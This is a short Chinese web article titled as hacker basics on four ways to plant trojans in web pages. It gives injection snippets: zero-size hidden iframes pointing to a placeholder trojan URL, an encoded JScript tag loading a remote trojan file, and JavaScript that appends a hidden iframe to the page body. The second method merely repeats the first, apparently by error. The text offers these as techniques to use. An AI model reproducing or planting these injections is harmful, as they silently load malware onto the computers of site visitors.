扫一扫
关注微信公众号

黑客基础知识之四种正确的挂木马方式
2007-01-09   

一、最简单的也是最有效的

iframe src=http://www.xxx.com/muma.html width=0 height=0></iframe>

二、JS挂马

iframe src=http://www.xxx.com/muma.html width=0 height=0></iframe>

三、JS变形加密

<SCRIPT language="JScript.Encode" src=http://www.xxx.com/muma.txt></script>

Muma.txt可改成任意后缀的。

四、不是嵌入,与Iframe不同

top.document.body.innerHTML = top.document.body.innerHTML 
+ '\r\n<iframe src="木马地址"></iframe>''

责任编辑 赵毅 zhaoyi#51cto.com TEL:(010)68476636-8001


热词搜索:

上一篇:安全基础知识介绍之什么是0day和Warez
下一篇:黑客基础知识系列之关于网页木马综述

分享到: 收藏